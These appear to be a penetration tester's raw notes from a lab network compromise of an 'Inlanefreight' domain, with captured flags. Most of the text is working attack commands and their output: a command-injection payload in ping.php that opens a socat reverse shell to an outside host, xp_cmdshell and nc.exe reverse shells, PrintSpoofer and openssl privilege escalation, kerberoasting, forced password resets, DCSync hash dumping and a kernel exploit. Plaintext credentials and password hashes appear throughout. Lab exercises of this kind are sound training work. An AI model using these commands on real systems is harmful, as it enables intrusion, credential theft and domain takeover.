10.129.229.147

Creds
- srvadm:ILFreightnixadm!
- pixel:letmein
- tom:Welcome1
/ping.php?ip=127.0.0.1%0d%0asocat${IFS}TCP:10.10.14.44:9001${IFS}EXEC:${PATH:0:1}bin${PATH:0:1}bash
got shell as webdev
home has lab_adm, pixel, srvadm, tom, webdev
srvadm has flag - b447c27a00e3a348881b0030177000cd
id shows webdev is a part of adm group that can read logs

running linpeas

we find `srvadm:ILFreightnixadm!`
/snap/snapd/24792/usr/lib/snapd/snap-confine = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_sys_chroot,cap_sys_ptrace,cap_sys_admin+p
pkexec policy
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin
Vulnerable to CVE-2021-3560
Sudo version 1.8.31

/var/mail/root
/var/spool/mail/root
/home/webdev/snap/lxd/common/config/config.yml

su srvadm and sudo -l shows we can run openssl as admin
follow the 17. Linux PrivEsc > Sudo Rights Abuse openssl part to create the shell.so on kali and send it to target
- on target: sudo /usr/bin/openssl engine -t -c "$(pwd)/shell.so"
got root and flag - a34985b5976072c3c148abc751671302
dumping passwords from /etc/shadow
Our target ip interanlly is: 172.16.8.120

PING Sweep on 172.16.8.0/24 returns

64 bytes from 172.16.8.3: icmp_seq=1 ttl=128 time=2.44 ms
64 bytes from 172.16.8.20: icmp_seq=1 ttl=128 time=1.63 ms
64 bytes from 172.16.8.50: icmp_seq=1 ttl=128 time=2.96 ms

172.16.8.20

[*] Windows 10 / Server 2019 Build 17763 x64 (name:ACADEMY-AEN-DEV) (domain:INLANEFREIGHT.LOCAL)
Creds mpalledorous:1squints2 hporter:Gr8hambino!

PORT     STATE SERVICE
80/tcp   open  http
111/tcp  open  rpcbind
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2049/tcp open  nfs
3389/tcp open  ms-wbt-server

flag - bf22a1d0acfca4af517e1417a80e92d1
DNN/web.config
- Administrator:D0tn31Nuk3R0ck$$@123

http

using above creds to log into the webapp
the dnn app is a cms.
- could not exploit file upload- was trying hashgrab
found an sql console
- enabled xp_cmdshell
- the target cant contact our kali box
- set up listener on jump host:9001 back to our 9001
- started nc on 9001
- ran xp_cmdshell 'powershell -e base64(172.16.8.120, 9001)'
- got a shell back on nc.
the sqluser has SeImpersonatePrivileges
uploading PrintSpoofer.exe & nc.exe via 10.129.229.147
c:\temp\Pfsf.exe -c "c:\temp\nc.exe 172.16.8.120 9001 -e cmd"
got system back on reverse shell with flag - K33p_0n_sp00fing!
saving sam system on dev01 share and getting on local machine

dumping these we get

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e20798f695ab0d04bc138b22344cea8:::
mpalledorous:1001:aad3b435b51404eeaad3b435b51404ee:3bb874a52ce7b0d64ee2a82bbf3fe1cc:::

INLANEFREIGHT.LOCAL/hporter:$DCC2$10240#hporter#f7d7bba128ca183106b8a3b3de5924bc:
Gr8hambino!

upload SharpHound and RunasCs to target
.\RunasCs.exe hporter 'Gr8hambino!' cmd.exe -r 172.16.8.120:9001
get a shell back as hporter.
SharpHound.exe -c All --zipfilename porter.zip
download porter.zip and run in bloodhound.

BloodHound

hporter can change password for smalls who is a member of IT_ADMINS
bloodyAD --host 172.16.8.3 -d inlanefreight.local -u hporter -p 'Gr8hambino!' set password ssmalls 'smoller@123'
checking smbshares for ssmalls. found: "Department Shares": "IT/Private/Development/SQL Express Backup.ps1"
- $mySrvConn.Login = backupadm:!qazXSW@
check smbshares for backupadm
found adun.vbs
- has account:L337^p@$$w0rD
Performed kerberoasting on all possible users.
- got backupjob:lucky7

172.16.8.50

PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
8080/tcp open  http-proxy

- port 8080 has a tomcat app

using backupadm:!qazXSW@with winrm on 172.16.8.50 works
got a kdbx , cracked to get Welcome1
- mssql:Super@123
- Administrator:Password_123 BOTH useless
got unattend.xml
- ilfserveradm:Sys26Admin
we can rdp as ilfserveradm.
checking Program Files (x86) we see Sysaxauthomation v 6.9.0
getting system shell by following - https://www.exploit-db.com/exploits/50834
got flag - 33a9d46de4015e7b3b0ad592a9394720
will dump mssqladm password as that will give us access to domain
found mssqladm:DBAilfreight1!

172.16.8.3

[*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)

PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl

- we have access to mssqladm - mssqladm has GenericWrite over TTIMMONS which has genericAll over Server Admins ATTACK 1. Get ttimmons access - rdp into 172.16.8.50 and open powershell as mssqladm - Import-Module .\PowerView.ps1 - Get-DomainUser -Identity "TargetUser" -Properties serviceprincipalname - Set-DomainObject -Identity "TargetUser" -Set @{serviceprincipalname='blah/blah'} - ON KALI - impacket-GetUserSPNs -dc-ip 172.16.8.3 INLANEFREIGHT.LOCAL/backupadm -request-user ttimmons -o ttimmons.hash - hashcat -m 13100 - got ttimmons:Repeat09 2. Get ttimmons added to server admins - bloodyAD --host 172.16.8.3 -d inlanefreight.local -u ttimmons -p Repeat09 add groupMember "Server Admins" ttimmons 3. Dump hashes as we have DCSync over the domain - impacket-secretsdump 'inlanefreight.local'/'ttimmons':'Repeat09'@172.16.8.3

Administrator:500:aad3b435b51404eeaad3b435b51404ee:fd1f7e5564060258ea787ddbb6e6afa2:::

- evil-winrm to get flag.txt - 7c09eb1fff981654a3bb3b4a4e0d176a - found that we can ping 172.16.9.3 (which is our machine) - set up ligolo double pivoting via 172.16.8.120 - found id_rsa files in the "Department Shares" folder

172.16.9.25

only has port 22 open
got ssmallsadm and flag - 3c4996521690cc76446894da2bf7dd8f

running linpeas

/opt/ipmi
has mysql
labadm has .ansible

ran ./traitor to find polkit and kernel versions vulnerable.
got root with kernel exploit
- and flag - 206c03861986c0e264438cb6e8e90a19